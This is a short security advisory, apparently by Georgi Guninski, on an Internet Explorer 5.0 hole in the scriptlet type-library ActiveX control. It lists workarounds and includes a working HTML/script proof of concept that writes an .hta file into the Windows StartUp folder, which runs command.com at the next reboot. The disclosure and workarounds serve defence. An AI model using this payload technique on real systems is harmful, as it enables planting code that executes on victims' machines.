Description:
Internet Explorer 5.0 under Windows 95/98 (do not know about NT) allows executing arbitrary programs on the local machine by creating and overwriting local files and putting content in them.
Details:
The problem is the ActiveX Control "Object for constructing type libraries
for scriptlets".
It allows creating and overwriting local files, and more putting content
in them.
There is some unneeded information in the file, but part of the content
may be chosen.
So, an HTML Application file may be created, feeded with an exploit
information and written to the StartUp folder.
The next time the user reboots (which may be forced), the code in the HTML Application file
will be executed.
This vulnerability can be exploited via email.
Workaround:
Disable Active Scripting
or
Disable Run ActiveX Controls and plug-ins
The code is:
<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
>
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written
by Georgi Guninski http://www.guninski.com');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>
Click here to test - warning: This will create a file in your StartUp folder